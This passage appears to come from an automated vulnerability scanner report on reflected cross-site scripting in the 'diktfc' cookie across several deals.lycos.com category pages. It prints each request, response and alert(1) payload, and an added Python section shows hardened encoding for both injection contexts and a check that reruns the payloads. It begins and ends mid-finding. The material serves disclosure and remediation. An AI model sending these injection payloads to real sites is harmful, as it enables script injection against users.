Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5b2d5"%3balert(1)//27c5d3438ff; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:59 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43716
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 930d9"%3balert(1)//408e2508bec was submitted in the diktfc cookie. This input was echoed as 930d9";alert(1)//408e2508bec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/babies-and-kids-224 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A930d9"%3balert(1)//408e2508bec; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35854
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74795"><script>alert(1)</script>8fa74226461 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/babies-and-kids-224 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A74795"><script>alert(1)</script>8fa74226461; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/babies-and-kids-224&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A74795"><script>alert(1)</script>8fa74226461&cj=1" alt="tracker" />
...[SNIP]...
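The two reflection contexts reported above, the double-quoted JavaScript string and the double-quoted src attribute of the scorecardresearch tracker image that the responses show on every category page, need different output encoding, and the scanner's remediation note covers only the script case. The following Python is an added example, not code from this report or from the deals.lycos.com application: it mirrors both reflections using the report's own payloads, shows a hardened rendering for each context, and includes the check a practitioner would rerun after the fix to confirm the payload no longer closes the attribute or the string literal. The `diktfc` variable name in the script fragment and the trimmed tracker URL are assumptions; the page does not show the vulnerable script itself.

```python
import html
import json
from html.parser import HTMLParser
from urllib.parse import quote

# Payloads copied from the report above. The script-context payload is shown
# after the application's URL decoding, which turned %3b into ';'.
ATTR_PAYLOAD = '74795"><script>alert(1)</script>8fa74226461'
JS_PAYLOAD = '930d9";alert(1)//408e2508bec'

# Trimmed form of the tracker URL seen in the responses (assumption: only the
# parameters needed to show the reflection are kept).
TRACKER_PREFIX = 'http://b.scorecardresearch.com/p?c1=2&c2=6036445&c15='


def render_img_vulnerable(cookie_value: str) -> str:
    """Mirror of the reported reflection: the raw cookie value is concatenated
    into a double-quoted src attribute (deliberately unsafe)."""
    return '<img src="' + TRACKER_PREFIX + cookie_value + '&cj=1" alt="tracker" />'


def render_img_fixed(cookie_value: str) -> str:
    """Hardened form. The value lands in a URL query parameter that itself
    lands in an HTML attribute, so it gets both encodings in that order:
    percent-encoding (so '"' and '<' become %22 and %3C) and then entity
    encoding of the whole attribute value (so '&' becomes '&amp;')."""
    url = TRACKER_PREFIX + quote(cookie_value, safe='') + '&cj=1'
    return '<img src="' + html.escape(url, quote=True) + '" alt="tracker" />'


def render_script_vulnerable(cookie_value: str) -> str:
    """Mirror of the script-context reflection (variable name is assumed)."""
    return 'var diktfc = "' + cookie_value + '";'


def render_script_fixed(cookie_value: str) -> str:
    """Hardened form: json.dumps yields a complete JS string literal with the
    double quote and backslash escaped (and, with ensure_ascii, U+2028/U+2029
    too). '<', '>' and '&' are additionally written as \\u003c-style escapes
    because the HTML parser ends a <script> block at '</' no matter how the
    JavaScript is quoted."""
    literal = json.dumps(cookie_value)
    literal = (literal.replace('<', '\\u003c')
                      .replace('>', '\\u003e')
                      .replace('&', '\\u0026'))
    return 'var diktfc = ' + literal + ';'


class _TagCollector(HTMLParser):
    """Records every start tag the HTML parser sees."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs) -> None:
        self.tags.append(tag)


def injected_script_tag(fragment: str) -> bool:
    """True if an HTML parser sees a <script> element in the fragment, i.e. the
    payload closed the attribute and the tag."""
    collector = _TagCollector()
    collector.feed(fragment)
    collector.close()
    return 'script' in collector.tags


def js_string_literal_intact(statement: str) -> bool:
    """True if everything after 'var diktfc = ' is exactly one double-quoted
    string literal followed by ';'. An unescaped '"' inside the value ends the
    literal early and leaves trailing code, which is the breakout."""
    prefix = 'var diktfc = '
    if not statement.startswith(prefix):
        return False
    body = statement[len(prefix):]
    if not body.startswith('"'):
        return False
    escaped = False
    for i in range(1, len(body)):
        ch = body[i]
        if escaped:
            escaped = False
        elif ch == '\\':
            escaped = True
        elif ch == '"':
            return body[i + 1:] == ';'
    return False


def check_payloads() -> dict:
    """Re-run the report's two payloads against both renderings of each context."""
    return {
        'attr_vulnerable': injected_script_tag(render_img_vulnerable(ATTR_PAYLOAD)),
        'attr_fixed': injected_script_tag(render_img_fixed(ATTR_PAYLOAD)),
        'js_vulnerable': js_string_literal_intact(render_script_vulnerable(JS_PAYLOAD)),
        'js_fixed': js_string_literal_intact(render_script_fixed(JS_PAYLOAD)),
    }


if __name__ == '__main__':
    for name, result in check_payloads().items():
        print(f'{name}: {result}')
```

Running `check_payloads()` reports a breakout for both vulnerable renderings (`attr_vulnerable` is True because the parser sees a script element, `js_vulnerable` is False because the literal ends early) and none for the hardened ones. Two points are easy to miss when fixing findings like these: the attribute fix needs percent-encoding for the URL parameter and then entity-encoding for the attribute, in the order the data is consumed, and the script fix must escape `<`, `>` and `&` inside the literal as well, since JavaScript quoting does nothing to stop the HTML parser from terminating the block at `</script>`.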
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8b3d"%3balert(1)//270e9be217c was submitted in the diktfc cookie. This input was echoed as e8b3d";alert(1)//270e9be217c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/cameras-167 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae8b3d"%3balert(1)//270e9be217c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47423
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8de9"><script>alert(1)</script>ca62e0e2bb6 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/cameras-167 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab8de9"><script>alert(1)</script>ca62e0e2bb6; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:52 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/cameras-167&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab8de9"><script>alert(1)</script>ca62e0e2bb6&cj=1" alt="tracker" />
...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b2e8"%3balert(1)//ec00ddd9290 was submitted in the diktfc cookie. This input was echoed as 2b2e8";alert(1)//ec00ddd9290 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/cell-phones-174 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2b2e8"%3balert(1)//ec00ddd9290; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42236
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfd7d"><script>alert(1)</script>0b7224d164c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/cell-phones-174 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abfd7d"><script>alert(1)</script>0b7224d164c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/cell-phones-174&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abfd7d"><script>alert(1)</script>0b7224d164c&cj=1" alt="tracker" />
...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52676"><script>alert(1)</script>35e6603099d was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/clothing-and-accessories-202 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A52676"><script>alert(1)</script>35e6603099d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/clothing-and-accessories-202&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A52676"><script>alert(1)</script>35e6603099d&cj=1" alt="tracker" />
...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3b23"%3balert(1)//cf9f07eb831 was submitted in the diktfc cookie. This input was echoed as b3b23";alert(1)//cf9f07eb831 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/clothing-and-accessories-202 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab3b23"%3balert(1)//cf9f07eb831; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:58 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47618
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 409c8"%3balert(1)//11fafd7bd7d was submitted in the diktfc cookie. This input was echoed as 409c8";alert(1)//11fafd7bd7d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/computer-39 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A409c8"%3balert(1)//11fafd7bd7d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:00 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47416
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcb82"><script>alert(1)</script>9d654d77a5c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/computer-39 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abcb82"><script>alert(1)</script>9d654d77a5c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:58 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/computer-39&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abcb82"><script>alert(1)</script>9d654d77a5c&cj=1" alt="tracker" />
...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4441"%3balert(1)//cc97a4d4e35 was submitted in the diktfc cookie. This input was echoed as b4441";alert(1)//cc97a4d4e35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/dating-services-445 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab4441"%3balert(1)//cc97a4d4e35; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:48 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:49 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17051
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c53d"><script>alert(1)</script>985194847a was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/dating-services-445 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5c53d"><script>alert(1)</script>985194847a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
